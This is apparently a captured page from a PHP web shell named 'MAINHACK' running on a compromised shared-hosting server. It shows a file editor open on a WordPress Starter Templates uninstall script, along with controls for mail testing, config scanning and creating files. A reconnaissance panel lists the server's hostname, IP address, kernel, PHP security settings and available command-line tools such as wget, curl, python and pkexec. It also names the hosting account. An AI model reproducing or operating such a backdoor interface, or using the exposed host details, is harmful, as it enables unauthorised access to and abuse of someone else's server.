[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: uninstall.php
<?php /** * Starter Templates Uninstall * * Fired when the plugin is deleted via the WordPress admin. * * @since 4.5.4 * @package Starter Templates */ defined( 'WP_UNINSTALL_PLUGIN' ) || exit; // Site data options. $site_pages = get_option( 'astra-sites-requests' ); if ( ! empty( $site_pages ) ) { // Delete all sites. for ( $site_page = 1; $site_page <= $site_pages; $site_page++ ) { delete_site_option( 'astra-sites-and-pages-page-' . $site_page ); } // Delete all pages count. delete_site_option( 'astra-sites-requests' ); } delete_option( 'astra_sites_recent_import_log_file' ); delete_option( 'ai_builder_recent_import_log_file' ); delete_option( 'astra_sites_import_data' ); delete_option( 'astra_sites_wpforms_ids_mapping' ); delete_option( '_astra_sites_old_customizer_data' ); delete_option( '_astra_sites_old_site_options' ); delete_option( '_astra_sites_old_widgets_data' ); delete_option( 'astra_sites_settings' ); delete_option( 'astra_parent_page_url' ); delete_option( 'astra-sites-favorites' ); delete_site_option( 'astra-sites-fresh-site' ); delete_site_option( 'astra-sites-batch-status' ); delete_site_option( 'astra-sites-batch-status-string' ); delete_site_option( 'astra-sites-all-site-categories' ); delete_site_option( 'astra-sites-all-site-categories-and-tags' ); delete_site_option( 'astra-sites-current-page' ); delete_site_option( 'astra_sites_surecart_mapping_data' ); // Import state options. delete_option( 'astra_sites_import_complete' ); delete_option( 'astra_sites_batch_process_started' ); delete_option( 'astra_sites_batch_process_started_time' ); delete_option( 'astra_sites_batch_process_complete' ); delete_option( 'astra_sites_ai_import_started' ); delete_option( 'ast_ai_import_current_url' ); delete_option( 'astra_sites_import_started' ); delete_option( 'astra_sites_current_import_template_type' );
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: premium171.web-hosting.com
Server IP: 162.0.209.115
PHP Version: 8.0.30
Server Software: LiteSpeed
System: Linux premium171.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
HDD Total: 97.87 GB
HDD Free: 71.36 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
No
pkexec:
No
git:
Yes
User Info
Username: aircyknj
User ID (UID): 2056
Group ID (GID): 2052
Script Owner UID: 2056
Current Dir Owner: 2056